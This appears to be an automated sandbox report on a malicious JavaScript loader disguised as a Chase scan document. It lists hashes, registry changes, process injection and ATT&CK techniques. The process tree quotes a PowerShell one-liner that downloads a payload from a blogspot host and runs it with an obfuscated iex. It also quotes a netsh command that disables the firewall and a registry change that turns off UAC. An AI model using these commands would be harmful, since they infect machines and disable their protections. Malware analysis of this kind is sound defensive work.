Analysis
-
max time kernel
137s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
16-01-2024 10:39
Static task
static1
Behavioral task
behavioral1
Sample
New_ScanDoc#092387CHASEeAdvice.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
New_ScanDoc#092387CHASEeAdvice.js
Resource
win10v2004-20231215-en
General
-
Target
New_ScanDoc#092387CHASEeAdvice.js
-
Size
1.4MB
-
MD5
286d534eb759c671fa9e79cfafd3bc85
-
SHA1
d165938c1c607618c5cb6d9d11cf5b371f007ac7
-
SHA256
77109ba56a5e70fafe88a10800764ec30d35727c1ff8cdb2934534ae8c7e048b
-
SHA512
3b1ee1a647b623265ad7e90d786e61cafe6ca5e312676dafcc198763cf8efe3f479fb66b4aae9d1e7289ec5433055ab193ffd91abefc732e3d337d4fe987119b
-
SSDEEP
192:FQzfvQzrHHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHHnHHHHHHf:efYzD
Malware Config
Signatures
-
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 4 1076 powershell.exe 8 1076 powershell.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation wscript.exe -
Registers COM server for autorun 1 TTPs 2 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Deissl1 = "schtasks /run /tn Deissl1" powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 46 api.ipify.org 47 api.ipify.org 50 ip-api.com -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exedescription pid process target process PID 1076 set thread context of 3624 1076 powershell.exe RegSvcs.exe PID 1076 set thread context of 1608 1076 powershell.exe RegSvcs.exe PID 1076 set thread context of 3872 1076 powershell.exe Msbuild.exe -
Drops file in Windows directory 1 IoCs
Processes:
dw20.exedescription ioc process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp dw20.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
dw20.exedw20.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
dw20.exedw20.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe -
Modifies registry class 3 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} powershell.exe Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exeRegSvcs.exepid process 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 3624 RegSvcs.exe 3624 RegSvcs.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exedw20.exeRegSvcs.exedw20.exedescription pid process Token: SeDebugPrivilege 1076 powershell.exe Token: SeRestorePrivilege 2380 dw20.exe Token: SeBackupPrivilege 2380 dw20.exe Token: SeBackupPrivilege 2380 dw20.exe Token: SeBackupPrivilege 2380 dw20.exe Token: SeBackupPrivilege 2380 dw20.exe Token: SeDebugPrivilege 3624 RegSvcs.exe Token: SeBackupPrivilege 1520 dw20.exe Token: SeBackupPrivilege 1520 dw20.exe Token: SeIncreaseQuotaPrivilege 1076 powershell.exe Token: SeSecurityPrivilege 1076 powershell.exe Token: SeTakeOwnershipPrivilege 1076 powershell.exe Token: SeLoadDriverPrivilege 1076 powershell.exe Token: SeSystemProfilePrivilege 1076 powershell.exe Token: SeSystemtimePrivilege 1076 powershell.exe Token: SeProfSingleProcessPrivilege 1076 powershell.exe Token: SeIncBasePriorityPrivilege 1076 powershell.exe Token: SeCreatePagefilePrivilege 1076 powershell.exe Token: SeBackupPrivilege 1076 powershell.exe Token: SeRestorePrivilege 1076 powershell.exe Token: SeShutdownPrivilege 1076 powershell.exe Token: SeDebugPrivilege 1076 powershell.exe Token: SeSystemEnvironmentPrivilege 1076 powershell.exe Token: SeRemoteShutdownPrivilege 1076 powershell.exe Token: SeUndockPrivilege 1076 powershell.exe Token: SeManageVolumePrivilege 1076 powershell.exe Token: 33 1076 powershell.exe Token: 34 1076 powershell.exe Token: 35 1076 powershell.exe Token: 36 1076 powershell.exe Token: SeIncreaseQuotaPrivilege 1076 powershell.exe Token: SeSecurityPrivilege 1076 powershell.exe Token: SeTakeOwnershipPrivilege 1076 powershell.exe Token: SeLoadDriverPrivilege 1076 powershell.exe Token: SeSystemProfilePrivilege 1076 powershell.exe Token: SeSystemtimePrivilege 1076 powershell.exe Token: SeProfSingleProcessPrivilege 1076 powershell.exe Token: SeIncBasePriorityPrivilege 1076 powershell.exe Token: SeCreatePagefilePrivilege 1076 powershell.exe Token: SeBackupPrivilege 1076 powershell.exe Token: SeRestorePrivilege 1076 powershell.exe Token: SeShutdownPrivilege 1076 powershell.exe Token: SeDebugPrivilege 1076 powershell.exe Token: SeSystemEnvironmentPrivilege 1076 powershell.exe Token: SeRemoteShutdownPrivilege 1076 powershell.exe Token: SeUndockPrivilege 1076 powershell.exe Token: SeManageVolumePrivilege 1076 powershell.exe Token: 33 1076 powershell.exe Token: 34 1076 powershell.exe Token: 35 1076 powershell.exe Token: 36 1076 powershell.exe Token: SeIncreaseQuotaPrivilege 1076 powershell.exe Token: SeSecurityPrivilege 1076 powershell.exe Token: SeTakeOwnershipPrivilege 1076 powershell.exe Token: SeLoadDriverPrivilege 1076 powershell.exe Token: SeSystemProfilePrivilege 1076 powershell.exe Token: SeSystemtimePrivilege 1076 powershell.exe Token: SeProfSingleProcessPrivilege 1076 powershell.exe Token: SeIncBasePriorityPrivilege 1076 powershell.exe Token: SeCreatePagefilePrivilege 1076 powershell.exe Token: SeBackupPrivilege 1076 powershell.exe Token: SeRestorePrivilege 1076 powershell.exe Token: SeShutdownPrivilege 1076 powershell.exe Token: SeDebugPrivilege 1076 powershell.exe -
Suspicious use of WriteProcessMemory 38 IoCs
Processes:
wscript.exepowershell.execsc.exeRegSvcs.exeMsbuild.exedescription pid process target process PID 4620 wrote to memory of 1076 4620 wscript.exe powershell.exe PID 4620 wrote to memory of 1076 4620 wscript.exe powershell.exe PID 1076 wrote to memory of 1680 1076 powershell.exe csc.exe PID 1076 wrote to memory of 1680 1076 powershell.exe csc.exe PID 1680 wrote to memory of 2928 1680 csc.exe cvtres.exe PID 1680 wrote to memory of 2928 1680 csc.exe cvtres.exe PID 1076 wrote to memory of 3188 1076 powershell.exe netsh.exe PID 1076 wrote to memory of 3188 1076 powershell.exe netsh.exe PID 1076 wrote to memory of 3624 1076 powershell.exe RegSvcs.exe PID 1076 wrote to memory of 3624 1076 powershell.exe RegSvcs.exe PID 1076 wrote to memory of 3624 1076 powershell.exe RegSvcs.exe PID 1076 wrote to memory of 3624 1076 powershell.exe RegSvcs.exe PID 1076 wrote to memory of 3624 1076 powershell.exe RegSvcs.exe PID 1076 wrote to memory of 3624 1076 powershell.exe RegSvcs.exe PID 1076 wrote to memory of 3624 1076 powershell.exe RegSvcs.exe PID 1076 wrote to memory of 3624 1076 powershell.exe RegSvcs.exe PID 1076 wrote to memory of 1608 1076 powershell.exe RegSvcs.exe PID 1076 wrote to memory of 1608 1076 powershell.exe RegSvcs.exe PID 1076 wrote to memory of 1608 1076 powershell.exe RegSvcs.exe PID 1076 wrote to memory of 1608 1076 powershell.exe RegSvcs.exe PID 1076 wrote to memory of 1608 1076 powershell.exe RegSvcs.exe PID 1076 wrote to memory of 1608 1076 powershell.exe RegSvcs.exe PID 1076 wrote to memory of 1608 1076 powershell.exe RegSvcs.exe PID 1076 wrote to memory of 1608 1076 powershell.exe RegSvcs.exe PID 1608 wrote to memory of 2380 1608 RegSvcs.exe dw20.exe PID 1608 wrote to memory of 2380 1608 RegSvcs.exe dw20.exe PID 1608 wrote to memory of 2380 1608 RegSvcs.exe dw20.exe PID 1076 wrote to memory of 3872 1076 powershell.exe Msbuild.exe PID 1076 wrote to memory of 3872 1076 powershell.exe Msbuild.exe PID 1076 wrote to memory of 3872 1076 powershell.exe Msbuild.exe PID 1076 wrote to memory of 3872 1076 powershell.exe Msbuild.exe PID 1076 wrote to memory of 3872 1076 powershell.exe Msbuild.exe PID 1076 wrote to memory of 3872 1076 powershell.exe Msbuild.exe PID 1076 wrote to memory of 3872 1076 powershell.exe Msbuild.exe PID 1076 wrote to memory of 3872 1076 powershell.exe Msbuild.exe PID 3872 wrote to memory of 1520 3872 Msbuild.exe dw20.exe PID 3872 wrote to memory of 1520 3872 Msbuild.exe dw20.exe PID 3872 wrote to memory of 1520 3872 Msbuild.exe dw20.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\New_ScanDoc#092387CHASEeAdvice.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm simoubizw.blogspot.com///////////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 62⤵
- UAC bypass
- Blocklisted process makes network request
- Registers COM server for autorun
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dvab1sqt\dvab1sqt.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDE98.tmp" "c:\Users\Admin\AppData\Local\Temp\dvab1sqt\CSC596A6479DCE643D5AB88413845D2E882.TMP"4⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue3⤵
- Modifies Windows Firewall
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7844⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7804⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER606C.tmp.xmlFilesize
4KB
MD533f1fb1effbbdcb3bd949836209447ee
SHA1cb6251488d53daad1b561a2091708bbd314df72e
SHA256aefb586921e61da8cea99877e479e2cf6d693883bcdf3c1dd285ccd12d01f2bf
SHA512cbb995add329ca6079e5cc2b1f09d7a280990105cafd8f4349fafa92deb2d01293439a6e9f6dc6136252d75abd1c69443f147dab8e3bcaaba9b14751ef901ecc
-
C:\Users\Admin\AppData\Local\Temp\RESDE98.tmpFilesize
1KB
MD5acd5dac3e92b3c07df3ad28fed23c928
SHA1fb8bd2dcbea4b0eab3c012df115683c8760728ea
SHA2563bef46c928e0e8245d3460a5c1d3a39609eff7dba7adbe699ce37dd34b8771b0
SHA5120669ec9645a61c03f46908b77e3dd870eece76b50415d6216f48c1c8b6d0bddbd4bca4e7d7ac3278614d79db37ea52450449a6664fd7fef22e5633e7025cf0e5
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5hz2ugr2.pm5.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\dvab1sqt\dvab1sqt.dllFilesize
3KB
MD5dcd5e0888cfd3f9f2eece002db999a19
SHA1af0308320dd4cfce06a4c8ecb8f9743aa87d5b75
SHA25604447919bd60cd9d6df421ce8f1a9f1dfc2b64a3c24b1ee90fa41a197c47f2b2
SHA5122373a81a09b082e792f14ad84202621bda874f9416a23b7bbc746a6d5730b1dbbd574d9043a0114bdb73919b59bc3c5d84e06addaa9806bb22aec8947269b8b6
-
\??\c:\Users\Admin\AppData\Local\Temp\dvab1sqt\CSC596A6479DCE643D5AB88413845D2E882.TMPFilesize
652B
MD5e1e96b3459f4c8d3e3698850f799a332
SHA1882e9ad01c788001a36af5cc03b46ee7a28ba52b
SHA256fdcbfff166d944d63a754b0098db064dfbb0674106b2dd1e47fd11e0036f1b16
SHA512dc6c63f01b90246f5d822d69cb49716df6f7e180e37151a831fe9bff1c6d9089341b57af8bc6670c01e46e8b0ea4572dcb53499c60349ea40dc4355834bd137d
-
\??\c:\Users\Admin\AppData\Local\Temp\dvab1sqt\dvab1sqt.0.csFilesize
870B
MD5e06ebf853695db38aaac82c9af297ae4
SHA1ef98bacec5ac2ae3bf24aac8ed56935a25c1f064
SHA25679c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344
SHA512036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759
-
\??\c:\Users\Admin\AppData\Local\Temp\dvab1sqt\dvab1sqt.cmdlineFilesize
369B
MD56e71e18be08b7b70742b999d9672127f
SHA198071edf4521415b98cd738c5e50fe58c1d58a49
SHA25653b56d29b68c3e64f6544f136f69e8b35d120a785d941497a045ddc2e66f32e0
SHA5120181034575d64fd749bd1946e521b07376cb402c0dcd45d0bd58f29ef9b61576be659dfc05df35cfe88c83723cf93a0e38a7a3aca026d76092fcb69181e790c2
-
memory/1076-28-0x00000239B6C00000-0x00000239B6C08000-memory.dmpFilesize
32KB
-
memory/1076-10-0x00007FFEBD1F0000-0x00007FFEBDCB1000-memory.dmpFilesize
10.8MB
-
memory/1076-13-0x000002399C690000-0x000002399C6A0000-memory.dmpFilesize
64KB
-
memory/1076-11-0x000002399C690000-0x000002399C6A0000-memory.dmpFilesize
64KB
-
memory/1076-12-0x000002399C690000-0x000002399C6A0000-memory.dmpFilesize
64KB
-
memory/1076-9-0x00000239B6850000-0x00000239B6872000-memory.dmpFilesize
136KB
-
memory/1076-30-0x00007FFEBD1F0000-0x00007FFEBDCB1000-memory.dmpFilesize
10.8MB
-
memory/1076-31-0x000002399C690000-0x000002399C6A0000-memory.dmpFilesize
64KB
-
memory/1076-32-0x000002399C690000-0x000002399C6A0000-memory.dmpFilesize
64KB
-
memory/1076-33-0x000002399C320000-0x000002399C32E000-memory.dmpFilesize
56KB
-
memory/1076-34-0x000002399C360000-0x000002399C37A000-memory.dmpFilesize
104KB
-
memory/1076-71-0x00007FFEBD1F0000-0x00007FFEBDCB1000-memory.dmpFilesize
10.8MB
-
memory/1076-68-0x000002399C690000-0x000002399C6A0000-memory.dmpFilesize
64KB
-
memory/1076-14-0x00000239B6DF0000-0x00000239B6FB2000-memory.dmpFilesize
1.8MB
-
memory/1608-39-0x0000000072B50000-0x0000000073101000-memory.dmpFilesize
5.7MB
-
memory/1608-40-0x0000000072B50000-0x0000000073101000-memory.dmpFilesize
5.7MB
-
memory/1608-58-0x0000000072B50000-0x0000000073101000-memory.dmpFilesize
5.7MB
-
memory/3624-38-0x0000000001100000-0x000000000118C000-memory.dmpFilesize
560KB
-
memory/3624-35-0x0000000000400000-0x000000000048C000-memory.dmpFilesize
560KB
-
memory/3624-45-0x0000000005880000-0x000000000591C000-memory.dmpFilesize
624KB
-
memory/3624-74-0x00000000057D0000-0x00000000057E0000-memory.dmpFilesize
64KB
-
memory/3624-46-0x0000000005920000-0x00000000059B2000-memory.dmpFilesize
584KB
-
memory/3624-73-0x00000000745F0000-0x0000000074DA0000-memory.dmpFilesize
7.7MB
-
memory/3624-49-0x00000000059C0000-0x0000000005A10000-memory.dmpFilesize
320KB
-
memory/3624-72-0x00000000071C0000-0x00000000071CA000-memory.dmpFilesize
40KB
-
memory/3624-51-0x0000000005BE0000-0x0000000005DA2000-memory.dmpFilesize
1.8MB
-
memory/3624-42-0x0000000005810000-0x0000000005876000-memory.dmpFilesize
408KB
-
memory/3624-41-0x0000000005DC0000-0x0000000006364000-memory.dmpFilesize
5.6MB
-
memory/3624-43-0x00000000057D0000-0x00000000057E0000-memory.dmpFilesize
64KB
-
memory/3624-36-0x00000000745F0000-0x0000000074DA0000-memory.dmpFilesize
7.7MB
-
memory/3872-67-0x0000000072B50000-0x0000000073101000-memory.dmpFilesize
5.7MB
-
memory/3872-50-0x0000000072B50000-0x0000000073101000-memory.dmpFilesize
5.7MB
-
memory/3872-48-0x0000000001010000-0x0000000001020000-memory.dmpFilesize
64KB
-
memory/3872-47-0x0000000072B50000-0x0000000073101000-memory.dmpFilesize
5.7MB